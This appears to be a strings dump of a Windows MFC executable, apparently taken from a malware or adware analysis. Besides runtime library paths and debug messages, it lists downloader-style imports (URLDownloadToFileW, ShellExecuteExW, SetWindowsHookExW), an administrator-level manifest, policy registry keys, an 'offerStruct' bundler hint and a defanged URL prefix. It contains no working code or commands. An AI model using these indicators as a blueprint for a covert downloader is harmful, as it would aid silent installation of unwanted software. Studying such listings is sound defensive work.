f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp

CHttpConnection

CHttpFile

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\inet.cpp

Unknown status: %d

Internet ctxt=%d:

Warning: throwing CInternetException for error %d

Warning: Extended error reported with no response info

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp

Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp

WM_HOTKEY

WM_SETHOTKEY

WM_IDLEUPDATECMDUI

WM_DDE_EXECUTE

WM_KEYLAST

WM_SYSKEYUP

WM_SYSKEYDOWN

WM_KEYUP

WM_KEYDOWN

WM_VKEYTOITEM

WM_CTLCOLORMSGBOX

WM_USER 0xX

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp

Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.

Warning: failed to reclaim %d bytes for memory safety pool.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp

Error: failed to load AfxFormatString string 0xx.

Error: illegal string index requested %d.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp

a %hs object at $%p, %u bytes long

an invalid object at $%p, %u bytes long

faulted while dumping object at $%p, %u bytes long

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp

m_bz.hTask =

m_bz.hResource =

m_bz.lpszTemplate =

m_bz.hInstance =

m_bz.lCustData =

m_bz.lpszCaption =

m_bz.hWndOwner =

m_bz.dwFlags =

m_bz.cbStruct =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c

f:\dd\vctools\crt_bld\self_x86\crt\src\streambuf

f:\dd\vctools\crt_bld\self_x86\crt\src\xlocale

f:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c

%s_%0x

%s(%d) :

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c

Client hook allocation failure at file %hs line %d.

Memory allocated at %hs(%d).

Client hook re-allocation failure at file %hs line %d.

HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory after end of heap buffer.

HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory before start of heap buffer.

CRT detected that the application wrote to a heap buffer that was freed.

crt block at 0x%p, subtype %x, %Iu bytes long.

client block at 0x%p, subtype %x, %Iu bytes long.

%hs(%d) :

#File Error#(%d) :

Data: <%s> %s

f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\threadex.c

_CrtDbgReport: String too long or IO Error

Debug %s!

Program: %s%s%s%s%s%s%s%s%s%s%s%s

f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c

%s(%d) : %s

_CrtDbgReport: String too long or Invalid characters in String

f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\w_env.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c

This is an unsupported way to load Visual C   DLLs. You need to modify your application to build with a manifest.

- Attempt to initialize the CRT more than once.

- CRT not initialized

Please contact the application's support team for more information.

- floating point support not loaded

f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c

GetProcessWindowStation

f:\dd\vctools\crt_bld\self_x86\crt\src\output.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\drive.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c

ADVAPI32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\read.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c

USER32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c

portuguese-brazilian

f:\dd\vctools\crt_bld\self_x86\crt\src\convrtcp.c

operator

Run-Time Check Failure #%d - %s

%s%s%s%s

%s%s%p%s%ld%s%d%s

user32.dll

f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c

MSPDB80.DLL

RegCloseKey

RegOpenKeyExA

f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp

MaxCore.cpp

.?AVCCmdTarget@@

MaxCoreDlg.cpp

.?AVCWebBrowser2@@

.?AVExecuteBase@@

.?AVExecuteFacade@@

Idispimp.cpp

.PAVCInternetException@@

.PAVCFileException@@

Text.cpp

.PAVCOleException@@

.PAVCException@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCArchiveException@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.PAVCOleDispatchException@@

zcÁ

R<u.pr

kC-O}

z%CMH

]%uce

o?.DCtO

Ñj\

[.NQ#

NpB0%xm

zcMD

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

RegOpenKeyExW

RegCreateKeyExW

RegOpenKeyW

RegEnumKeyW

RegCreateKeyW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

ShellExecuteW

ShellExecuteExW

UrlUnescapeW

URLDownloadToFileW

GetKeyState

CreateDialogIndirectParamW

UnhookWindowsHookEx

SetWindowsHookExW

HttpQueryInfoW

HttpSendRequestW

HttpOpenRequestW

InternetOpenUrlW

InternetCanonicalizeUrlW

InternetCrackUrlW

(.fFb#

1')3-=#3=') '#

hs.SS

<5"95"95"90

;$.:'.:$&:)

(08(03`-035(F*(.RK-

1>" (0:1

(($40 ,( 0 ,4$,0 0 ,

.text

`.rdata

@.data

.rsrc

@.reloc

M\.EW

ghgH%u3

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PAD

KERNEL32.DLL

ADVAPI32.dll

COMDLG32.dll

dbghelp.dll

GDI32.dll

IPHLPAPI.DLL

ole32.dll

OLEACC.dll

OLEAUT32.dll

oledlg.dll

RPCRT4.dll

SHELL32.dll

SHLWAPI.dll

urlmon.dll

USER32.dll

WININET.dll

WINSPOOL.DRV

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xutility

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlsimpstr.h

AtlThrow: hr = 0x%x

std::_Vector_const_iterator<unsigned int,class std::allocator<unsigned int> >::operator *

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\vector

std::_Vector_const_iterator<unsigned int,class std::allocator<unsigned int> >::operator  =

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xstring

std::_Vector_const_iterator<struct offerStruct *,class std::allocator<struct offerStruct *> >::operator *

std::_Vector_const_iterator<class std::vector<unsigned int,class std::allocator<unsigned int> > *,class std::allocator<class std::vector<unsigned int,class std::allocator<unsigned int> > *> >::operator *

std::_Vector_const_iterator<struct offerStruct *,class std::allocator<struct offerStruct *> >::operator  =

std::_Vector_const_iterator<class std::vector<unsigned int,class std::allocator<unsigned int> > *,class std::allocator<class std::vector<unsigned int,class std::allocator<unsigned int> > *> >::operator  =

Id: = index: = score: ] %c

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\memory

Total list score: d

std::_Vector_const_iterator<unsigned char,class std::allocator<unsigned char> >::operator *

std::_Vector_const_iterator<unsigned char,class std::allocator<unsigned char> >::operator  =

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\ostream

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator *

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator   

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator  =

std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >::operator []

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator *

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator   

hWarning: implicit LoadString(%u) failed

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator  =

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlconv.h

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xtree

std::_Tree<class std::_Tmap_traits<int,wchar_t const *,struct std::less<int>,class std::allocator<struct std::pair<int const ,wchar_t const *> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<int,wchar_t const *,struct std::less<int>,class std::allocator<struct std::pair<int const ,wchar_t const *> >,0> >::const_iterator::operator *

invalid operator<

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::_Inc

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::_Inc

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::_Dec

ExtractIcon.cpp

std::vector<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator []

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\list

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator *

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator   

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\regex

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\algorithm

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator --

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator --

std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator *

std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator   

std::vector<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > >::operator []

std::_Vector_const_iterator<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > >::operator  =

_std::_Vector_const_iterator<char,class std::allocator<char> >::operator *

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlcomcli.h

std::vector<wchar_t,class std::allocator<wchar_t> >::operator []

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator  =

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator *

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator   

std::vector<class argument,class std::allocator<class argument> >::operator []

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator  =

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator *

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator   

start.gif

std::vector<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator []

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator *

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator   

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator  =

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

Gstd::_Tree<class std::_Tmap_traits<unsigned int,class CTrayIcon *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class CTrayIcon *> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<unsigned int,class CTrayIcon *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class CTrayIcon *> >,0> >::const_iterator::operator *

%s%s%s

HX

_hd_%S

0mb_%S

SELECT * FROM Win32_OperatingSystem

CACHE_S_FORMATETC_NOTSUPPORTED

CO_E_SERVER_EXEC_FAILURE

MK_E_INTERMEDIATEINTERFACENOTSUPPORTED

OLE_E_ADVISENOTSUPPORTED

REGDB_E_KEYMISSING

UCACHE_E_FIRST...CACHE_E_LAST

CACHE_S_FIRST...CACHE_S_LAST

CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST

CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST

CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST

CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST

CLIPBRD_E_FIRST...CLIPBRD_E_LAST

CLIPBRD_S_FIRST...CLIPBRD_S_LAST

CONVERT10_E_FIRST...CONVERT10_E_LAST

CONVERT10_S_FIRST...CONVERT10_S_LAST

CO_E_FIRST...CO_E_LAST

CO_S_FIRST...CO_S_LAST

DATA_E_FIRST...DATA_E_LAST

DATA_S_FIRST...DATA_S_LAST

DRAGDROP_E_FIRST...DRAGDROP_E_LAST

DRAGDROP_S_FIRST...DRAGDROP_S_LAST

ENUM_E_FIRST...ENUM_E_LAST

ENUM_S_FIRST...ENUM_S_LAST

INPLACE_E_FIRST...INPLACE_E_LAST

INPLACE_S_FIRST...INPLACE_S_LAST

MARSHAL_E_FIRST...MARSHAL_E_LAST

MARSHAL_S_FIRST...MARSHAL_S_LAST

MK_E_FIRST...MK_E_LAST

MK_S_FIRST...MK_S_LAST

OLEOBJ_E_FIRST...OLEOBJ_E_LAST

OLEOBJ_S_FIRST...OLEOBJ_S_LAST

OLE_E_FIRST...OLE_E_LAST

OLE_S_FIRST...OLE_S_LAST

REGDB_E_FIRST...REGDB_E_LAST

REGDB_S_FIRST...REGDB_S_LAST

VIEW_E_FIRST...VIEW_E_LAST

VIEW_S_FIRST...VIEW_S_LAST

FACILITY_WINDOWS

severity: %s, facility: %s ($lX)

range: %s ($lX)

%s ($lX)

Warning: constructing COleException, scode = %s.

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h

ntdll.dll

kernel32.dll

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

%s%s.dll

%s (%s:%d)

Hf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

Error: failed to execute DDE command '%s'.

Warning: DDE command '%s' ignored because window is disabled.

pMRU: open file (%d) '%s'.

Can't register window class named %s

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

accKeyboardShortcut

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h

commctrl_DragListMsg

Kf:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

Binding entry %d failed. Status: %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h

GetData failed - HRESULT = 0x%X

m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)

ERROR: Dialog named '%s' must have the child style.

ERROR: Dialog named '%s' must be invisible.

ERROR: Cannot find dialog template named '%s'.

CLSID\%s

Interface\%s

mfcm90ud.dll

QueryInterface(%s) failed

QueryInterface(%s) succeeded

Kcomctl32.dll

Kcomdlg32.dll

Kshell32.dll

Kf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

hXXp://

connecting to socket address '%s'

resolved name for %s!

resolving name for %s

Warning: destroying an open %s with handle %8.8X

Warning: Disconnecting %s handle %8.8X in context %8.8X at destruction.

LHTTP/1.0

WININET.DLL

Warning: could not get volume information '%s'.

Warning: could not parse the path '%s'. Path is too long.

Warning: could not parse the path '%s'.

CFile exception: %hs, File %s, OS error information = %ld.

AppMsg

WinMsg

CmdRouting

0xx

%s: hwnd=0xX, msg = 0xX (0xX, 0xX)

%s: hwnd=0xX, msg = %hs (0xX, 0xX)

%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d

%s: Execute '%s'.

Warning: OleInitialize returned scode = %s.

mscoree.dll

nf:\dd\vctools\crt_bld\self_x86\crt\src\xstring

Nf:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp

%S(%d) :

ppCategory && pfnCrtDbgReport

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlmem.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h

mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE

wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)

wcscpy_s(szExeName, 260, L"<program name unknown>")

__crtMessageWindowW

f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c

f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\stat64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\printf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c

_CrtCheckMemory()

_CrtIsValidHeapPointer(pUserData)

_CrtSetDbgFlag

(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)

_CrtMemCheckpoint

f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c

f:\dd\vctools\crt_bld\self_x86\crt\src\rewind.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wprintf.c

nf:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c

